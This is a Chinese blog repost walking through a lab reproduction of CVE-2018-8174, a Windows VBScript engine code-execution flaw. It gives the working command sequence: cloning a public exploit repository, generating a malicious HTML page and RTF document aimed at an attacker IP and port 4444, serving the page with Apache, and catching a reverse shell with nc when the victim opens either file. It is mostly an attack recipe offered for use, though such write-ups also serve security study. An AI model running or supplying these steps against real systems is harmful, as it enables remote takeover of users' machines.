双杀 0day 漏洞(CVE-2018-8174)复现
Posted sch01ar
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了双杀 0day 漏洞(CVE-2018-8174)复现相关的知识,希望对你有一定的参考价值。
漏洞描述:
CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞。
微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174
由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。
漏洞复现:
攻击机 IP:192.168.220.160
靶机 IP:192.168.220.161
项目地址:https://github.com/Sch01ar/CVE-2018-8174_EXP
┌─[[email protected]]─[/sch01ar] └──? #git clone https://github.com/Sch01ar/CVE-2018-8174_EXP
ls 看一下
生成带有恶意 VBscript 的 html 页面和 word 文档
┌─[[email protected]]─[/sch01ar/CVE-2018-8174_EXP] └──? #python CVE-2018-8174.py -u http://192.168.220.160/exploit.html -o msf.rtf -i 192.168.220.160 -p 4444
-u:URL 地址
-o:生成文档
-i:监听地址
-p:监听端口
查看一下生成的文件
把 explot.html 复制到 /var/www/html,并开启 apache 服务
┌─[[email protected]]─[/sch01ar/CVE-2018-8174_EXP] └──? #cp exploit.html /var/www/html ┌─[[email protected]]─[/sch01ar/CVE-2018-8174_EXP] └──? #service apache2 start
用 nc 监听 4444 端口
用靶机的 IE 浏览器打开恶意 URL
攻击机收到靶机的 shell 会话
在靶机用 word 打开 msf.rtf
攻击机同样也收到会话
以上是关于双杀 0day 漏洞(CVE-2018-8174)复现的主要内容,如果未能解决你的问题,请参考以下文章